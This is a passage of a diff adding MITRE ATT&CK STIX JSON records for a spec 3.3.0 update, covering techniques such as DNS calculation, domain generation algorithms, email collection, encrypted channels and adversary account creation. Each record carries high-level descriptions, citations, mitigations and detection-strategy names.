+                            "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
+                        },
+                        {
+                            "source_name": "ESET Sednit 2017 Activity",
+                            "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.",
+                            "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"
+                        },
+                        {
+                            "source_name": "Data Driven Security DGA",
+                            "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.",
+                            "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Chris Roffe"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.644000+00:00\", \"old_value\": \"2025-10-24 17:49:00.128000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0039: Detection Strategy for Dynamic Resolution across OS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-11 14:56:34.154000+00:00",
+                    "modified": "2026-05-12 15:12:00.673000+00:00",
+                    "name": "DNS Calculation",
+                    "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1568/003",
+                            "external_id": "T1568.003"
+                        },
+                        {
+                            "source_name": "Meyers Numbered Panda",
+                            "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.",
+                            "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/"
+                        },
+                        {
+                            "source_name": "Moran 2014",
+                            "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group &#91;Blog&#93;. Retrieved November 12, 2014.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
+                        },
+                        {
+                            "source_name": "Rapid7G20Espionage",
+                            "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.",
+                            "url": "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.673000+00:00\", \"old_value\": \"2025-10-24 17:49:03.093000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0262: Detection Strategy for Dynamic Resolution through DNS Calculation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-10 17:44:59.787000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Domain Generation Algorithms",
+                    "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or \u201cgibberish\u201d strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1568/002",
+                            "external_id": "T1568.002"
+                        },
+                        {
+                            "source_name": "Elastic Predicting DGA",
+                            "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.",
+                            "url": "https://arxiv.org/pdf/1611.00791.pdf"
+                        },
+                        {
+                            "source_name": "Talos CCleanup 2017",
+                            "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.",
+                            "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html"
+                        },
+                        {
+                            "source_name": "Pace University Detecting DGA May 2017",
+                            "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.",
+                            "url": "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf"
+                        },
+                        {
+                            "source_name": "FireEye POSHSPY April 2017",
+                            "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
+                        },
+                        {
+                            "source_name": "ESET Sednit 2017 Activity",
+                            "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.",
+                            "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"
+                        },
+                        {
+                            "source_name": "Data Driven Security DGA",
+                            "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.",
+                            "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/"
+                        },
+                        {
+                            "source_name": "Akamai DGA Mitigation",
+                            "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.",
+                            "url": "https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e"
+                        },
+                        {
+                            "source_name": "Cisco Umbrella DGA",
+                            "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms \u2013 Why so effective?. Retrieved February 18, 2019.",
+                            "url": "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/"
+                        },
+                        {
+                            "source_name": "Cybereason Dissecting DGAs",
+                            "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.",
+                            "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf"
+                        },
+                        {
+                            "source_name": "Unit 42 DGA Feb 2019",
+                            "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ryan Benson, Exabeam",
+                        "Barry Shteiman, Exabeam",
+                        "Sylvain Gil, Exabeam"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-10-24 17:48:25.458000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0419: Detection Strategy for Dynamic Resolution using Domain Generation Algorithms."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-19 18:46:06.098000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Local Email Collection",
+                    "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\<username>\\Documents\\Outlook Files` or `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1114/001",
+                            "external_id": "T1114.001"
+                        },
+                        {
+                            "source_name": "Microsoft Outlook Files",
+                            "description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.",
+                            "url": "https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790"
+                        },
+                        {
+                            "source_name": "Outlook File Sizes",
+                            "description": "N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.",
+                            "url": "https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:29.669000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1041: Encrypt Sensitive Information",
+                            "M1060: Out-of-Band Communications Channel"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0047: Detect Local Email Collection via Outlook Data File Access and Command Line Tooling"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-19 18:52:24.547000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "Remote Email Collection",
+                    "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1114/002",
+                            "external_id": "T1114.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2025-10-24 17:49:15.355000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1032: Multi-factor Authentication",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1060: Out-of-Band Communications Channel"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0048: Detect Remote Email Collection via Abnormal Login and Programmatic Access"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-16 15:48:33.882000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Asymmetric Cryptography",
+                    "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1573/002",
+                            "external_id": "T1573.002"
+                        },
+                        {
+                            "source_name": "SANS Decrypting SSL",
+                            "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.",
+                            "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840"
+                        },
+                        {
+                            "source_name": "SEI SSL Inspection Risks",
+                            "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.",
+                            "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2025-10-24 17:49:18.961000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1020: SSL/TLS Inspection",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0543: Detection Strategy for Encrypted Channel via Asymmetric Cryptography across OS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-16 15:45:17.032000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Symmetric Cryptography",
+                    "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1573/001",
+                            "external_id": "T1573.001"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-24 17:48:32.429000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0143: Detection Strategy for Encrypted Channel via Symmetric Cryptography across OS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 01:05:42.216000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Establish Accounts",
+                    "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1585",
+                            "external_id": "T1585"
+                        },
+                        {
+                            "source_name": "Free Trial PurpleUrchin",
+                            "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.",
+                            "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/"
+                        },
+                        {
+                            "source_name": "NEWSCASTER2014",
+                            "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.",
+                            "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation"
+                        },
+                        {
+                            "source_name": "Mandiant APT1",
+                            "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+                            "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+                        },
+                        {
+                            "source_name": "BlackHatRobinSage",
+                            "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.",
+                            "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:24.456000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0873: Detection of Establish Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-05-27 14:06:05.130000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Cloud Accounts",
+                    "description": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nCreating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1585/003",
+                            "external_id": "T1585.003"
+                        },
+                        {
+                            "source_name": "Awake Security C2 Cloud",
